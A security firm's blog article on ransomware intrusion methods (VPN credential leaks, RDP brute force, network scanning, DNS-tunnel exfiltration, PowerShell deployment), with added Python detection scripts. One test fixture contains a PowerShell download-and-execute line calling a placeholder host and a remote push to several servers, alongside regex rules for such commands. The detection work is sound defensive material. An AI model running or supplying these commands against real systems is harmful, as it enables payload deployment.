Cyber Attacks: Attacker Techniques and the Business Impact
Many businesses across the UK are concerned about the impact that a cyber-attack can have, especially the ramifications of a ransomware attack. Recent news has been dominated by the devastating and detrimental effects of ransomware attacks across the globe, including those launched against the Colonial Pipeline in the US, JBS Foods and KP Snacks. Research clearly illustrates the increase in ransomware attacks compared to a pre-pandemic world.
From IntaForensics’ perspective, this has been almost directly attributable to the sudden growth in home working as a result of Covid-19. As more businesses rushed to enable remote working for their employees, they had little time to assess the security impact, and many companies enabled systems and services without a proper security risk assessment. Whilst this was a challenging time for people and companies across the globe, for attackers it was a great opportunity, as their list of potential targets suddenly grew on an exponential scale.
What is the most common technique for cyber attacks?
However, it is a common misconception that ransomware attacks are the most common type of attack that businesses face. In fact, according to the DCMS Cyber Breaches Survey 2021, ransomware attacks were only the fifth most common type of attack that businesses reported experiencing – with 7% of businesses and 6% of charities reporting that they suffered a ransomware attack in the last twelve months*. The most common mode of attack by far is phishing emails, with 83% of businesses and 79% of charities having reported this form of attack. Nevertheless, the impact of a successful ransomware attack can be much more serious than that of a phishing email.
In our experience, attackers use three tactics to gain initial access and breach an organisation’s security ahead of ransomware deployment: a vulnerable VPN service, publicly available remote desktop access and phishing emails. A successful breach is then typically followed by the removal or exfiltration of data.
Vulnerable VPN Service
Recently, we were called to investigate a ransomware attack against one of our clients that began through their VPN, and to determine how it occurred. As with many businesses during the government-imposed lockdowns in the UK, our client had made remote access to their company infrastructure available to staff so that the business could continue to operate. The business had enabled a VPN service on their Fortinet firewall. Unfortunately, it became clear that the version the firewall was running was affected by a credential disclosure vulnerability.
This meant that an attacker, using a specially crafted request to the firewall, could retrieve a list of usernames and passwords for all VPN users. One of the first questions we ask customers when performing incident response engagements for ransomware attacks is: ‘what remote access arrangements do you have in place?’
By analysing the firewall’s logs as part of our investigation, we discovered that user accounts had been accessed from unusual IP addresses. These IP addresses were not associated with the users, nor were they located in the UK, where all of the employees were based.
The client had also enabled single sign-on. This meant that once the attacker had these VPN credentials, they were able to access the customer environment directly and proceed with their ransomware attack. Our penetration testing team were able to re-create the attack and provide advice and guidance to prevent a similar attack from happening in the future.
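The log review described above, as an added example that is not from the article or from IntaForensics: it flags VPN logons from outside the address ranges staff are expected to use, and one source address authenticating as several different users, which is what a leaked credential list tends to look like. The key=value log format, the expected ranges and the accounts are constructed.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed VPN authentication log in a simple key=value form (not a real
# vendor format). Only successful tunnel establishments are analysed.
VPN_LOG = """\
ts=2021-03-02T08:01:10 user=alice srcip=192.0.2.40 action=tunnel-up
ts=2021-03-02T08:05:44 user=bob srcip=198.51.100.22 action=tunnel-up
ts=2021-03-02T08:40:00 user=bob srcip=198.51.100.22 action=tunnel-down
ts=2021-03-02T02:17:03 user=alice srcip=203.0.113.7 action=tunnel-up
ts=2021-03-02T02:18:30 user=carol srcip=203.0.113.7 action=tunnel-up
ts=2021-03-02T09:12:00 user=carol srcip=192.0.2.41 action=tunnel-up
"""

# Assumption: address ranges staff are expected to connect from (UK ISP or
# office ranges in a real deployment; documentation ranges are used here).
EXPECTED_RANGES = [ipaddress.ip_network("192.0.2.0/24"),
                   ipaddress.ip_network("198.51.100.0/24")]

def parse_vpn_log(text):
    """Return one dict per successful VPN authentication."""
    records = []
    for line in text.splitlines():
        fields = dict(re.findall(r"(\w+)=(\S+)", line))
        if fields.get("action") == "tunnel-up":
            records.append(fields)
    return records

def in_expected_ranges(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EXPECTED_RANGES)

def find_vpn_anomalies(records):
    """Flag logons from outside the expected ranges, and one source address
    used by more than one account."""
    alerts = []
    users_by_ip = defaultdict(set)
    for r in records:
        users_by_ip[r["srcip"]].add(r["user"])
        if not in_expected_ranges(r["srcip"]):
            alerts.append(("unexpected-source", r["user"], r["srcip"], r["ts"]))
    for ip, users in sorted(users_by_ip.items()):
        if len(users) > 1:
            alerts.append(("shared-source", ",".join(sorted(users)), ip, ""))
    return alerts

if __name__ == "__main__":
    for alert in find_vpn_anomalies(parse_vpn_log(VPN_LOG)):
        print(alert)
```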
Publicly Available Remote Desktop Access
Another common form of initial access that we see exploited by attackers is Microsoft’s Remote Desktop service.
One of our clients suffered a brute-force attack against their publicly available remote desktop service. The attacker tried multiple combinations of usernames and passwords to gain access to the organisation’s server. Because our client did not enforce a sufficiently strong password policy and had no monitoring in place, the attacker was able to find a username and password combination that worked and gained access to the environment. This unfortunately led to a ransomware attack across the business.
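The monitoring that was missing in the case above, as an added example that is not from the article or from IntaForensics: it reads Windows Security events 4625 (failed logon) and 4624 (successful logon) with logon type 10 (RemoteInteractive, i.e. RDP), raises an alert when one source address fails repeatedly inside a short window, and a second alert if that source then logs on successfully. The event extract, the window and the threshold are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security log extract (not from a real host):
# (timestamp, event id, target account, source address, logon type).
# 4625 = failed logon, 4624 = successful logon; logon type 10 = RDP.
GUESSED = ["administrator", "admin", "backup", "jsmith", "guest", "test"]
EVENTS = [(f"2021-04-10T01:00:{i * 3:02d}", 4625, name, "203.0.113.9", 10)
          for i, name in enumerate(GUESSED)]
EVENTS += [
    ("2021-04-10T01:03:40", 4624, "jsmith", "203.0.113.9", 10),  # guess succeeds
    ("2021-04-10T09:15:00", 4625, "alice", "192.0.2.20", 10),    # one mistyped password
    ("2021-04-10T09:15:20", 4624, "alice", "192.0.2.20", 10),
]

WINDOW = timedelta(minutes=5)   # assumption: tuning values, not from the article
THRESHOLD = 5

def detect_rdp_bruteforce(events, window=WINDOW, threshold=THRESHOLD):
    """Alert on sources with >= threshold RDP failures inside the window, and
    again if such a source then logs on successfully while the window is open."""
    alerts = []
    failures = defaultdict(list)   # source address -> timestamps of recent 4625s
    flagged = set()
    for ts_text, event_id, account, src, logon_type in sorted(events):
        if logon_type != 10:
            continue
        ts = datetime.fromisoformat(ts_text)
        recent = [t for t in failures[src] if ts - t <= window]
        if event_id == 4625:
            recent.append(ts)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, len(recent)))
        elif event_id == 4624 and src in flagged and recent:
            alerts.append(("bruteforce-success", src, account))
        failures[src] = recent
    return alerts

if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(EVENTS):
        print(alert)
```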
Once an attacker has access to your systems, what happens next?
To deploy ransomware, attackers need to understand your environment and the type of systems you are running. This can be achieved with ‘network enumeration’. Typically, attackers will run a tool designed to sweep a network and identify any live systems, which they then probe further for more details, such as whether the system is a file server or workstation.
One of these network enumeration tools is called Advanced Port Scanner. We saw this tool run on one of our client’s customer networks: the attacker had gained access to a server, then installed and ran Advanced Port Scanner. Once the network scan had completed, the tool was removed so that a quick review by the company would not have identified its use. By examining the organisation’s event log records, we were able to identify that the tool had been used, the scope of the scan and even the user account that had been used to install it.
As our customer had a ‘flat’ network, with no separation between systems, the attacker was unfortunately able to target the entire environment for their ransomware attack.
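Network-level detection of the sweep described above, as an added example that is not from the article or from IntaForensics: over constructed connection records (the kind a firewall or flow export produces), it flags any source that contacts an unusually large number of distinct hosts or host/port pairs within one minute. The records, the window and the thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection records (not real data):
# (timestamp, source address, destination address, destination port).
# One host sweeps ten neighbours on four common service ports ...
FLOWS = [(f"2021-06-03T14:00:{i:02d}", "192.0.2.50", f"192.0.2.{100 + i // 4}", p)
         for i, p in enumerate([445, 3389, 135, 22] * 10)]
# ... while a normal client talks to a couple of file servers.
FLOWS += [("2021-06-03T14:00:05", "192.0.2.10", "192.0.2.200", 445),
          ("2021-06-03T14:00:09", "192.0.2.10", "192.0.2.201", 445)]

WINDOW = timedelta(seconds=60)   # assumption: tuning values, not from the article

def detect_sweeps(flows, window=WINDOW, min_hosts=10, min_services=20):
    """Return (source, distinct hosts, distinct host/port pairs) for every source
    that exceeds either threshold inside a sliding time window."""
    by_src = defaultdict(list)
    for ts, src, dst, port in flows:
        by_src[src].append((datetime.fromisoformat(ts), dst, port))
    alerts = []
    for src, recs in sorted(by_src.items()):
        recs.sort()
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1                      # slide the window forward
            current = recs[start:end + 1]
            hosts = {d for _, d, _ in current}
            services = {(d, p) for _, d, p in current}
            if len(hosts) >= min_hosts or len(services) >= min_services:
                alerts.append((src, len(hosts), len(services)))
                break                           # one alert per source is enough
    return alerts

if __name__ == "__main__":
    for alert in detect_sweeps(FLOWS):
        print(alert)
```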
Removal or Exfiltration of Data
Another tactic that is increasingly used by attackers is the removal or exfiltration of data from customer environments. This tactic is used to convince companies to pay ransom demands: the attacker threatens to release the stolen data unless the ransom is paid. Here at IntaForensics, we recommend that an organisation never pays the ransom, because there is no guarantee that you will get your data back, your environment is still vulnerable and you are likely to be targeted again.
There are several methods we have seen attackers use to remove data from a network. More sophisticated attacks use techniques such as DNS tunnelling. In one compromised environment we investigated, the customer’s data was being transferred out of the network disguised as DNS queries. Luckily for our compromised client, we were able to identify the transfers taking place and limit the amount of data that was taken. These kinds of techniques are rare, but they do highlight the need for a good monitoring system to be in place.
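The kind of monitoring that catches data leaving as DNS queries, as an added example that is not from the article or from IntaForensics: data tunnelled over DNS has to be encoded into query names, so a client that asks for many unique, long, high-entropy subdomains of one domain stands out from ordinary lookups. The query log, the domain names and the thresholds are constructed; the hex labels are pseudo-random stand-ins for encoded data chunks.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed DNS query log (not from a real resolver): one "client qname" per line.
BENIGN = ["www.example.com", "mail.example.com", "cdn.example.com",
          "login.example.com", "api.example.com"]
DNS_LOG = "\n".join(f"192.0.2.10 {q}" for q in BENIGN)
DNS_LOG += "\n" + "\n".join(   # one client, eight unique 40-hex-char labels
    f"192.0.2.12 {hashlib.sha256(bytes([i])).hexdigest()[:40]}.badexample.net"
    for i in range(8))

def shannon_entropy(text):
    """Bits per character; encoded data scores far higher than real host names."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def split_qname(qname):
    """Split 'a.b.example.com' into ('example.com', 'a.b'). This approximation
    ignores public suffixes such as co.uk; a suffix list would fix that."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def detect_dns_tunnelling(log, min_unique=5, min_len=30, min_entropy=3.0):
    """Flag (client, domain) pairs with many unique, long, high-entropy subdomains."""
    subs = defaultdict(list)
    for line in log.splitlines():
        client, qname = line.split()
        domain, sub = split_qname(qname)
        subs[(client, domain)].append(sub)
    alerts = []
    for (client, domain), labels in subs.items():
        uniq = set(labels)
        if len(uniq) < min_unique:
            continue
        avg_len = sum(len(s) for s in uniq) / len(uniq)
        avg_ent = sum(shannon_entropy(s) for s in uniq) / len(uniq)
        if avg_len >= min_len and avg_ent >= min_entropy:
            alerts.append((client, domain, len(uniq), round(avg_len, 1), round(avg_ent, 2)))
    return alerts

if __name__ == "__main__":
    for alert in detect_dns_tunnelling(DNS_LOG):
        print(alert)
```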
Another method of data exfiltration relies on the use of freely available services, such as Dropbox or Google Drive. An attacker can easily create a free user account on these services, which gives access to a significant amount of storage for free. For example, Google Drive offers 15GB for free when users create accounts. This is plenty of storage space for thousands of documents to be stored.
Google Drive and Dropbox are also used by some companies for legitimate business purposes, which can make it difficult for internal teams to identify the malicious requests among normal traffic.
How do cyber attackers push ransomware into your system?
The final tactic used by attackers is deploying ransomware within a target environment. As most businesses use Microsoft Windows almost exclusively as their core operating system, we see ‘PowerShell’ being used to push ransomware into systems and compromise the environment. PowerShell is a useful and powerful tool for system administrators. However, it is attractive to attackers too, as they don’t need to install or configure any tools of their own in an organisation’s environment.
What is PowerShell?
A PowerShell command was run in one of our client’s environments. In this example, the PowerShell script itself was hosted on a compromised web server outside of the customer environment. A PowerShell command was used to download the script from the web server before executing it within the customer network. The script was the actual ransomware payload and, when executed, would encrypt files on systems. The attacker used a single compromised server to push the ransomware script out to every server in the customer environment using PowerShell’s remoting capabilities. We were able to advise our client on configuration changes to make in their environment to ensure that only trusted users were able to run PowerShell, helping to minimise the risk of any future attacks.
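Triage of PowerShell script block logging (Event ID 4104) for the pattern described above, as an added example that is not from the article or from IntaForensics: it flags script blocks that fetch code from a remote host and run it in memory, that push a script to many computers at once, or that were run by an account outside an assumed allowlist of trusted PowerShell users. The events, the allowed-user set and the fan-out threshold are constructed.

```python
import re

# Constructed script block logging events (Event ID 4104), not from a real host:
# (timestamp, user, script text).
EVENTS = [
    ("2021-05-01T10:02:11", "CORP\\svc_admin",
     "Get-Service | Where-Object Status -eq 'Stopped'"),
    ("2021-05-01T23:41:07", "CORP\\jsmith",
     "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/p.ps1')"),
    ("2021-05-01T23:44:30", "CORP\\jsmith",
     "Invoke-Command -ComputerName srv01,srv02,srv03,srv04 -FilePath C:\\temp\\p.ps1"),
]

# Assumption: the only accounts permitted to run PowerShell in this environment.
ALLOWED_USERS = {"CORP\\svc_admin"}

# Each rule is (name, regex over the script text).
RULES = [
    ("remote-download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("inline-execute", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
    ("encoded-command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]

def fanout_targets(script):
    """Hosts named in an Invoke-Command -ComputerName list, if any."""
    m = re.search(r"-ComputerName\s+(\S+)", script, re.I)
    return m.group(1).split(",") if m else []

def triage_script_blocks(events, min_fanout=3):
    """Return (timestamp, user, reasons) for every script block worth a look."""
    alerts = []
    for ts, user, script in events:
        reasons = [name for name, rx in RULES if rx.search(script)]
        targets = fanout_targets(script)
        if len(targets) >= min_fanout:
            reasons.append(f"fanout:{len(targets)}")
        if user not in ALLOWED_USERS:
            reasons.append("unapproved-user")
        if reasons:
            alerts.append((ts, user, reasons))
    return alerts

if __name__ == "__main__":
    for alert in triage_script_blocks(EVENTS):
        print(alert)
```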
IntaForensics provides a comprehensive range of cyber security services designed to prevent, monitor, and respond to security breaches.
We boast a team of 50 cyber security and digital forensic experts and a growing market presence. Our consultants will be able to assist with all digital forensic investigations, PCI DSS PFI and QSA, Cyber Security and Incident Response.
Quality underpins everything we do, and we are proud to be UKAS 17025:2017 accredited and ISO/IEC 27001:2013, ISO 9001:2015 and ISO 14001:2015 certified.
For further advice on protecting your organisation against ransomware attacks, please contact us.